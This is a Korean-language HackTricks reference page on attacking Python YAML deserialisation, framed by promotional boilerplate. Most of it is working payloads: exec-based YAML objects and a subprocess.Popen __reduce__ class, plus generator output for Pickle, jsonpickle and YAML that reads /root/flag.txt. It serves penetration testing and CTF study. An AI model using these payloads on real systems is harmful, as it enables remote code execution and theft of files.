Python Yaml Deserialization

htARTE (HackTricks AWS Red Team Expert)를 통해 제로부터 영웅이 되는 AWS 해킹을 배우세요

다른 방법으로 HackTricks를 지원하는 방법:

회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하길 원한다면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 스왜그를 구매하세요
The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
💬 Discord 그룹 또는 텔레그램 그룹에 가입하거나 트위터 🐦 @carlospolopm을 팔로우하세요.
해킹 트릭을 공유하려면 HackTricks 및 HackTricks Cloud github 저장소에 PR을 제출하세요.

Yaml 역직렬화

Yaml 파이썬 라이브러리는 원시 데이터뿐만 아니라 파이썬 객체를 직렬화할 수도 있습니다:

print(yaml.dump(str("lol")))
lol
...

print(yaml.dump(tuple("lol")))
!!python/tuple
- l
- o
- l

print(yaml.dump(range(1,10)))
!!python/object/apply:builtins.range
- 1
- 10
- 1

확인해보세요 튜플은 데이터의 원시 유형이 아니므로 직렬화되었습니다. 그리고 range도 마찬가지입니다 (내장에서 가져옴).

safe_load() 또는 **safe_load_all()**은 SafeLoader를 사용하며 클래스 객체 역직렬화를 지원하지 않습니다. 클래스 객체 역직렬화 예시:

import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:builtins.range [1, 10, 1]'

print(yaml.load(data, Loader=UnsafeLoader)) #range(1, 10)
print(yaml.load(data, Loader=Loader)) #range(1, 10)
print(yaml.load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=Loader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=UnsafeLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.load_all(data, Loader=FullLoader)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.unsafe_load(data)) #range(1, 10)
print(yaml.full_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>
print(yaml.unsafe_load_all(data)) #<generator object load_all at 0x7fc4c6d8f040>

#The other ways to load data will through an error as they won't even attempt to
#deserialize the python object

이전 코드는 직렬화된 파이썬 클래스를 로드하기 위해 unsafe_load를 사용했습니다. 이는 버전 >= 5.1에서, load()에 Loader가 지정되지 않았거나 Loader=SafeLoader로 지정되지 않은 경우 직렬화된 파이썬 클래스나 클래스 속성을 역직렬화하는 것을 허용하지 않기 때문입니다.

기본적인 취약점

sleep를 실행하는 예시:

import yaml
from yaml import UnsafeLoader, FullLoader, Loader
data = b'!!python/object/apply:time.sleep [2]'
print(yaml.load(data, Loader=UnsafeLoader)) #Executed
print(yaml.load(data, Loader=Loader)) #Executed
print(yaml.load_all(data))
print(yaml.load_all(data, Loader=Loader))
print(yaml.load_all(data, Loader=UnsafeLoader))
print(yaml.load_all(data, Loader=FullLoader))
print(yaml.unsafe_load(data)) #Executed
print(yaml.full_load_all(data))
print(yaml.unsafe_load_all(data))

Loader가 없는 취약한 .load("<content>")

pyyaml의 이전 버전은 무언가를 로드할 때 Loader를 지정하지 않았다면 역직렬화 공격에 취약했습니다: yaml.load(data)

여기에서 취약점에 대한 설명을 찾을 수 있습니다. 해당 페이지에서 제안된 악용은:

!!python/object/new:str
state: !!python/tuple
- 'print(getattr(open("flag\x2etxt"), "read")())'
- !!python/object/new:Warning
state:
update: !!python/name:exec

또는 @ishaack이 제공한 이 원 라이너를 사용할 수도 있습니다:

!!python/object/new:str {state: !!python/tuple ['print(exec("print(o"+"pen(\"flag.txt\",\"r\").read())"))', !!python/object/new:Warning {state : {update : !!python/name:exec } }]}

최근 버전에서는 더 이상 .load()를 Loader 없이 호출할 수 없습니다. **FullLoader**는 이러한 공격에 더 이상 취약하지 않습니다.

RCE

PyYAML 또는 ruamel.yaml과 같은 Python YAML 모듈을 사용하여 사용자 정의 payload를 생성할 수 있습니다. 이러한 payload는 적절한 살균 처리 없이 신뢰할 수 없는 입력을 역직렬화하는 시스템의 취약점을 악용할 수 있습니다.

import yaml
from yaml import UnsafeLoader, FullLoader, Loader
import subprocess

class Payload(object):
def __reduce__(self):
return (subprocess.Popen,('ls',))

deserialized_data = yaml.dump(Payload()) # serializing data
print(deserialized_data)

#!!python/object/apply:subprocess.Popen
#- ls

print(yaml.load(deserialized_data, Loader=UnsafeLoader))
print(yaml.load(deserialized_data, Loader=Loader))
print(yaml.unsafe_load(deserialized_data))

Payload 생성 도구

도구 https://github.com/j0lt-github/python-deserialization-attack-payload-generator를 사용하여 Pickle, PyYAML, jsonpickle 및 ruamel.yaml을 악용하는 python 직렬화 페이로드를 생성할 수 있습니다:

python3 peas.py
Enter RCE command :cat /root/flag.txt
Enter operating system of target [linux/windows] . Default is linux :linux
Want to base64 encode payload ? [N/y] :
Enter File location and name to save :/tmp/example
Select Module (Pickle, PyYAML, jsonpickle, ruamel.yaml, All) :All
Done Saving file !!!!

cat /tmp/example_jspick
{"py/reduce": [{"py/type": "subprocess.Popen"}, {"py/tuple": [{"py/tuple": ["cat", "/root/flag.txt"]}]}]}

cat /tmp/example_pick | base64 -w0
gASVNQAAAAAAAACMCnN1YnByb2Nlc3OUjAVQb3BlbpSTlIwDY2F0lIwOL3Jvb3QvZmxhZy50eHSUhpSFlFKULg==

cat /tmp/example_yaml
!!python/object/apply:subprocess.Popen
- !!python/tuple
- cat
- /root/flag.txt

참고 자료

htARTE (HackTricks AWS Red Team Expert)를 통해 **제로부터 히어로까지 AWS 해킹 배우기**!

HackTricks를 지원하는 다른 방법:

회사를 HackTricks에서 광고하거나 PDF로 다운로드하고 싶다면 구독 요금제를 확인하세요!
공식 PEASS & HackTricks 스왜그를 구매하세요
The PEASS Family를 발견하세요, 당사의 독점 NFTs 컬렉션
💬 디스코드 그룹이나 텔레그램 그룹에 가입하거나 트위터** 🐦 @carlospolopm를 팔로우하세요.
해킹 트릭을 공유하려면 PR을 제출하여 HackTricks 및 HackTricks Cloud github 저장소로 이동하세요.

PreviousExploiting __VIEWSTATE without knowing the secrets NextJNDI - Java Naming and Directory Interface & Log4Shell

Last updated 3 days ago